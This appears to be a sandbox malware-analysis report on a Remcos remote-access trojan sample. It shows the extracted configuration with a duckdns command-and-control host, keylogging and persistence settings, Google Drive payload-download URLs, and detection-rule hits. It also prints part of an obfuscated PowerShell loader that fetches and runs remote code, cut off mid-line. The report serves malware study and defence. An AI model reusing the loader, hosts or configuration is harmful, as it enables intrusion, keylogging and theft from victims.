Source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp |
Malware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"} |
Source: |
Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32 source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: nt.Automation.pdb source: powershell.exe, 00000004.00000002.1838938605.0000000006E75000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.1838938605.0000000006E0D000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb& source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000004.00000002.1844919840.0000000006F01000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.m |
Source: powershell.exe, 00000004.00000002.1838938605.0000000006E75000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.1508363745.0000029181EBF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1508363745.0000029180231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808999477.0000000004491000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1508363745.0000029180231000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000004.00000002.1808999477.0000000004491000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1508363745.0000029181E81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000002.00000002.1508363745.0000029180457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.000002918180D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/g |
Source: msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/o |
Source: powershell.exe, 00000002.00000002.1508363745.0000029180457000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7P |
Source: powershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7XR |
Source: powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000002.00000002.1508363745.00000291806C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: msiexec.exe, 00000007.00000003.1792322934.0000000007480000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.0000000007480000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/ |
Source: msiexec.exe, 00000007.00000003.1792322934.0000000007480000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=16BcB-CnWtRtHDq7UA6aD9a4cHD2R7_Ck&export=download |
Source: powershell.exe, 00000002.00000002.1508363745.00000291806C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=16KUqaQ_X6zbBHAGNnsewuswUAZxtxGv7&export=download |
Source: powershell.exe, 00000004.00000002.1808999477.00000000045E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1508363745.0000029180E0D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.1508363745.0000029181E86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.0000029181EA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1508363745.00000291806C0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: amsi32_8036.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7796, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenF |